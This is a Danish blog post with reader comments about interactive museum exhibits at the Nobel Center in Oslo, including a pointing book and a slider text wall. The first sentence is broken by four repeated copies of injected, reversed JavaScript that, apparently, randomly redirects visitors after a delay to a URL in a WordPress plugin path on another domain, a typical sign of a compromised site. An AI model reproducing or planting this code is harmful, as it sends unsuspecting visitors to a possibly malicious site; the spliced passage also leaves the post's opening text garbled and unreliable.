Interaktive museumstekster

Efter et par dage i Norge vil jeg lige dele disse toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to hjemmevideoer af interaktive museumstekster på Nobel Center i Oslo.

Min mand var så venlig at agere håndmodel, og demonstrere, hvordan den “interaktive pegebog” giver adgang til nye informationer efterhånden som der bladres og fingren holdes hen over forskellige symboler.  Systemet i den interaktive væg er, at teksten ændrer sig, når en lille “skyder” føres frem og tilbage på et menulignende display i siden af teksten.

5 comments to “Interaktive museumstekster”
 1. Jeg synes umiddelbart at “bogmodellen” virkede som den bedste. Faktisk kunne jeg godt se mange anvendelses- og udviklingsmuligheder, ikke mindst hvis man skulle benytte arkivalier. De kan jo være lidt vanskelige at afkode, hvis man ikke læser gotisk. Et lille ikon man kunne føre fingeren henover, og dermed få adgang til fx transkriberede pointer, ville lette adgangen til deres indhold i udstilingsmæssig sammenhæng.

  Kunne også godt forestille mig, at man via en sådan “pegebog” kunne skabe forskellige veje igennem bogen og dermed lade brugeren være med til at definere det narrative forløb (fx med henvisninger til forskellige sider, og dermed forskellige “nuancer” i historien, alt efter hvilken ikon, man lader fingren hvile på). Jeg tror det kunne virke rigtig godt, især hvis brugeren kunne sidde med det i en slags faktarum eller til “selvstudium”. Det var i hvert fald et ønske, jeg straks selv fik 🙂

  “Skydemodellen” synes jeg ikke virkede helt så godt som bogen, men det kan vær een smagssag.

 2. Ser super spændende ud, kommer helt sikkert på listen over museer der skal besøges. I den sammenhæng kan jeg anbefale http://cwr.iwm.org.uk/ Churchill museum and cabinet war rooms i London. Hvor deres interaktive bord et et af de mest brugervenlige,sjove og informative ting jeg har prøvet på et museum.

 3. Tak for videoerne. Det ser interessant ud, især bogen, der kombinerer det fysiske og det digitale.

  Jeg vil dog tillade mig at brumme lidt i skægget og mene, at udfra hvad jeg kunne jeg på videoerne, så er ingen af de to eksempler interaktive, fordi der ikke ser en vekselvirkning mellem brugeren og opstillingen, jvf: http://www.formidlingsnet.dk/arkiv/interaktion-i-udstillinge
  Ikke mere end der gør i en bog, hvor man selv vælger hvilken side man vil slå op på. Måske skulle det snarere kaldes aktivitet end interaktivitet?

 4. Mjah… jeg kan godt se hvad du mener, og er nok egentlig enig hvad angår den nederste, den med “skyderen”. Bogens sider ændrer sig alt efter hvilken side man slår op i, men selve indholdet på siden er også dynamisk, og ændrer sig alt efter hvad man peger på (både tekst og billeder) Desuden indeholdt rummet en væg, som afspejlede en del af teksten fra bogen. Jeg synes helt klart, at det var den, der var den bedst fungerende.

Skriv et svar